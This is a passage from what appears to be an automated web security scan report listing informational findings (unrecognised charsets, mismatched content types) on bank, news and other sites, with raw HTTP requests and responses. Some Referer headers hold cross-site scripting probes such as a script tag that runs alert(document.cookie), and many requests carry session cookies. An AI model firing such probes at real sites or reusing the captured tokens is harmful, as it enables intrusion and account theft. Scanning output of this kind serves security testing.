Set-cookie: MC=^dlv6nLB_DEtlMTGowZrrNRWb_gSAk1J2HQKA0w6IAAO3QABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT
Set-cookie: spc=321; path=/
Cache-control: public
Set-cookie: HttpOnly
Set-cookie: JSESSIONID=7117D3482F67F60B23716F580E8C6714; path=/; secure
Content-length: 259
Content-type: text/html
Fsreqid: REQ4d49d8740a034c3a20000edd0000aa33
Fscalleeid: ibweb321
Fselapsedtime: 9769
Connection: close


<html>

<head>


<title>
Citizens Investments
</title>

</head>

<FRAMESET ROWS="100%, *" frameborder=no border=0>
<FRAME NAME="mainframe" onload='javascript:' SRC="/my/citizensinvest/jsp/login
...[SNIP]...

25.112. http://www.oneofacard.com/generalinfo2.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oneofacard.com
Path:   /generalinfo2.asp

Request

GET /generalinfo2.asp HTTP/1.1
Host: www.oneofacard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:19:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4353
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARBSQDD=MANFCHGAJMLLDLMDMBKANAFE; path=/
Cache-control: private

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"
...[SNIP]...

25.113. https://www.pnc.com/MapQuest/mqlocator/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /MapQuest/mqlocator/index.html

Request

GET /MapQuest/mqlocator/index.html HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:15 GMT
Last-Modified: Fri, 14 Jan 2011 15:32:34 GMT
Content-Length: 518
Keep-Alive: timeout=60, max=295
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US

<html>
<head>
<meta http-equiv="refresh" content="0;url=index.jsp">
<!--
Need to keep this page longer than 512 bytes to prevent IE from using its
custom error messages.
012345678901234567890123
...[SNIP]...

25.114. https://www.pncadvisors.com/ilink/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pncadvisors.com
Path:   /ilink/index.html

Request

GET /ilink/index.html HTTP/1.1
Host: www.pncadvisors.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:20 GMT
Server: Apache
Last-Modified: Wed, 01 Aug 2007 15:33:06 GMT
Content-Length: 363
Connection: close
Content-Type: text/html
Content-Language: en-US

<html>
<head>
   <title>I-Link Login</title>
<meta http-equiv="Expires" content="Tue, 04 Dec 1993 21:29:02 GMT">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Co
...[SNIP]...

25.115. https://www.pncadvisors.com/thirdpartyindex.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pncadvisors.com
Path:   /thirdpartyindex.html

Request

GET /thirdpartyindex.html HTTP/1.1
Host: www.pncadvisors.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:19 GMT
Server: Apache
Last-Modified: Wed, 13 Feb 2008 15:10:50 GMT
Content-Length: 1111
Connection: close
Content-Type: text/html
Content-Language: en-US

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Advisors Microsite for ThirdParty and Employee</title>

<meta http-
...[SNIP]...

25.116. https://www.pncsites.com/IRA/home.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pncsites.com
Path:   /IRA/home.html

Request

GET /IRA/home.html HTTP/1.1
Host: www.pncsites.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:22 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 19:21:30 GMT
ETag: "4280c7-ae2-49b518e5da280"
Accept-Ranges: bytes
Content-Length: 2786
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>PNC B
...[SNIP]...

25.117. http://www.retirement.merrilledge.com/publish/images/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /publish/images/

Request

GET /publish/images/ HTTP/1.1
Host: www.retirement.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pxs=689c136b798e446897d1c2e0184bb0f5; SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxv=4B1B9E90-7DD2-4095-A535-9FE88031C408; CMAVID=none; cmTPSet=Y; BrowserCheckDone=true;

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 23:45:24 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...

25.118. http://www.thestandard.com.hk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thestandard.com.hk
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.thestandard.com.hk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSCSSRSQ=CABDPJKADHMKIKHPIDDLPNCO

Response

HTTP/1.1 404 Not Found
Content-Length: 73
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 02:00:34 GMT

<meta http-equiv="refresh" content="0;url=http://www.thestandard.com.hk">

25.119. http://www.thestandard.com.hk/news_detail.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thestandard.com.hk
Path:   /news_detail.asp

Request

GET /news_detail.asp HTTP/1.1
Host: www.thestandard.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 01:17:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCSSRSQ=JECBPJKAJCJNPMKCCLGBEBJC; path=/
Cache-control: private


<html>

<HTML>
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e21'</font>
<p>
<font face="Arial" size=2>ODBC driver does no
...[SNIP]...

25.120. http://www.usbank.com/cust_serv_cs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /cust_serv_cs.html

Request

GET /cust_serv_cs.html HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Connection: close
Date: Wed, 02 Feb 2011 22:20:40 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 06 Sep 2005 23:32:13 GMT
ETag: "803c62353bb3c51:10b3"
Content-Length: 393

<!--- Converted for SR12850 5.2005 ljq --->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<SCRIPT language="JavaScript1.1">
<!--
location.replace("/cgi_w/c
...[SNIP]...

25.121. http://www.usbank.com/locators.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /locators.html

Request

GET /locators.html HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Connection: close
Date: Wed, 02 Feb 2011 22:20:40 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 27 Jun 2006 18:20:10 GMT
ETag: "0a9d53169ac61:10b3"
Content-Length: 324

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<script language="JavaScript1.1">
<!--
location.replace("/usbanklocations/search.jsp");
//-->
</script>
<noscript>
...[SNIP]...

25.122. https://www.wachovia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /

Request

GET / HTTP/1.1
Host: www.wachovia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CB01F7F42F17102FA757AB53C440707C

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:49 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 20 Jan 2011 00:00:08 GMT
Accept-Ranges: bytes
Cache-Control: max-age=7158
Expires: Thu, 03 Feb 2011 00:00:08 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Keep-Alive: timeout=10, max=187
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 26584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wachovia - Person
...[SNIP]...

25.123. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

Request

GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354 HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Web Server
Date: Wed, 02 Feb 2011 23:45:21 GMT
Content-type: text/html
Content-length: 4661
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Error - washingtonpost.com</title>

<script type="text/javascript">
<!--
//YOU CAN CHANGE THE NODE HERE
t
...[SNIP]...

25.124. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

Request

GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Web Server
Date: Wed, 02 Feb 2011 23:45:20 GMT
Content-type: text/html
Content-length: 4661
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Error - washingtonpost.com</title>

<script type="text/javascript">
<!--
//YOU CAN CHANGE THE NODE HERE
t
...[SNIP]...

25.125. https://www4.usbank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www4.usbank.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www4.usbank.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CAMPID=""; WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391

Response

HTTP/1.1 404 Not Found
Content-Length: 7228
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:00:56 GMT

<html>

<head>
<title>U.S. Bank Internet Banking - Page Not Found</title>
<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">

<script language="JavaScript" src=
...[SNIP]...

26. HTML uses unrecognised charset  previous  next
There are 4 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


26.1. https://secure.opinionlab.com/ccc01/comment_card.asp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDCQATDDAR=FGIHILFAKFPCACOOHKFEFHBP; path=/
Date: Wed, 02 Feb 2011 22:02:31 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

26.2. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.boston.com
Path:   /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html HTTP/1.1
Host: www.boston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:30 GMT
Server: Apache/2.2.13 (Unix)
Set-Cookie: pathCnt=1; path=/; domain=.boston.com
Accept-Ranges: bytes
Served-By: rebecca
Content-Type: text/html
Connection: close
Set-Cookie: bcpage=0;expires=Fri, 08-Jan-2016 01:06:30 GMT;path=/;domain=boston.com;
Content-Length: 40252

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!-- Need for HL -->
<script language="JavaScript"><!--

var trustedT
...[SNIP]...
="Description" content="North End, Mass. News and information; updates on the schools in North End, Massachusetts, sports, taxes, zoning, restaurants, new businesses, and more from The Boston Globe.">
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<meta property="og:title" content="Fishermen rebut claims that bluefin is endangered" />
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cache.boston.com/universal/css/bcom_blog_styles.css" />
<meta http-equiv="Content-Type" content="text/html; charset="ISO-8859-1">


<!--[if IE]>
...[SNIP]...

26.3. http://www.julong.com.cn/en/News/188.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.julong.com.cn
Path:   /en/News/188.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/News/188.html HTTP/1.1
Host: www.julong.com.cn
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:16:50 GMT
Content-Length: 7312
Content-Type: text/html
Content-Location: http://www.julong.com.cn/en/News/188.html
Last-Modified: Thu, 10 Apr 2008 00:38:40 GMT
Accept-Ranges: bytes
ETag: "f4b7ea38a39ac81:7a839"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<meta content="IPBOARD,Julong Educational,WhiteBoard" name="keywords">
...[SNIP]...

26.4. http://www.rthk.org.hk/rthk/news/englishnews/20110126/news_20110126_56_729958.htm  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.rthk.org.hk
Path:   /rthk/news/englishnews/20110126/news_20110126_56_729958.htm

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /rthk/news/englishnews/20110126/news_20110126_56_729958.htm HTTP/1.1
Host: www.rthk.org.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: RTHK Web Server
Date: Thu, 03 Feb 2011 01:17:29 GMT
Content-Type: text/html
X-Cache: MISS from none
Via: 1.0 none:80 (squid/2.6.STABLE7)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
<title> Ocean Park 'putting species at risk' </title>
<meta http-equiv="Content-Type" content="text/html; charset=big5">
<meta name="WT.cg_n" content="news:enca" />
...[SNIP]...

27. Content type incorrectly stated  previous  next
There are 55 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


27.1. https://a248.e.akamai.net/atlas.download.akamai.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://a248.e.akamai.net
Path:   /atlas.download.akamai.com/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /atlas.download.akamai.com/ HTTP/1.1
Host: a248.e.akamai.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 02 Feb 2011 21:59:24 GMT
Content-Length: 15
Connection: close

File not found.

27.2. http://a3.twimg.com/profile_images/357754763/cross_normal.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a3.twimg.com
Path:   /profile_images/357754763/cross_normal.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/357754763/cross_normal.gif HTTP/1.1
Host: a3.twimg.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'%3E%3Cscript%3Ealert(1)%3C/script%3E5b968c91723=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=252460800
Date: Wed, 02 Feb 2011 23:38:46 GMT
Content-Length: 3543
Content-Type: image/gif
ETag: "47a1d9d09131bd67995f47c584a16e17"
Expires: Tue, 01 Jan 2019 06:25:54 GMT
Last-Modified: Tue, 11 Aug 2009 23:00:38 GMT
Server: AmazonS3
X-Amz-Cf-Id: 5f1dfbf889e28798812e3df65fbfd4f848524e4f18131c91a9dd9307cdc05454f4f41a2887f0dc18,662236fbac60c822de2cda8242876152055fa50c602865120b9836a5d7fe46a1cb9a5d1c5ed20382
x-amz-id-2: +wKjz/wadiNt6yyfZvk9YQTRjUnz12fqwQOUkD7Gx+ixWu2aFX94z/YNJVbUtN7C
x-amz-request-id: 15B745A9E4FEFB81
X-Cache: Miss from cloudfront
Connection: keep-alive

.PNG
.
...IHDR...0...0......`n....    pHYs...H...H.F.k>...    vpAg...0...0....W..tIDATX.......u...wO.hgw......m%!..Z.........T.....1U....k.R.T......P..c0....BB .Zi..Jhw..o=3........ $X    .....uj.>s....=?(
...[SNIP]...

27.3. http://affiliate.invisionpower.com/scripts/track.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://affiliate.invisionpower.com
Path:   /scripts/track.php

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /scripts/track.php?url=H_www.invisionpower.com%2F%2Fproducts%2Fboard%2F&referrer=H_www.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dipboard%2Bsoftware&getParams=&anchor=&cookies= HTTP/1.1
Host: affiliate.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://www.invisionpower.com/products/board/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:24:59 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
P3P: CP="NOI NID ADMa DEVa PSAa OUR BUS ONL UNI COM STA OTC"
Content-Length: 48
Content-Type: application/x-javascript

setVisitor('7432e15fddd3a34a2d79b00lmU2qECVV');

27.4. http://api.maps.yahoo.com/ajaxymap  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.maps.yahoo.com
Path:   /ajaxymap

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ajaxymap?v=3.8&appid=branchmap HTTP/1.1
Host: api.maps.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.branchmap.com/v53/ajaxmap.php?v=53&clientid=navy&loc=5&dist=3&zip=22180&zoom=8&networks=vcom,coop,cashpoints,moneypass,keybank&sbgc=D7D8CA&bgc=D7D8CA&bdc=084073&tc=000000&sc=000000&mw=552&mh=500&vertchecks=1&checksheight=130&shortdesc=1&ds=1&sortstrict=0&ov=1&ed=1&sw=175&hourspop=1&xml=1&bdist=1&&intl=1&dist=9&zoom=12&zip=&client=navy&city=9a923%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E09ca345e6cd
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=80eipqp6i4psl&b=3&s=j8; CH=AgBNOdMQADghEAAmWBAAEGsQAD6fEAANYBAACHoQABZaEAAiBBAADhgQAAdB

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:16:01 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 969

var YAHOO=window.YAHOO||{};
YAHOO.namespace=function(_1){
if(!_1||!_1.length){
return null;
}
var _2=_1.split(".");
var _3=YAHOO;
for(var i=(_2[
...[SNIP]...

27.5. http://api.viglink.com/api/ping  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /api/ping HTTP/1.1
Host: api.viglink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c;

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
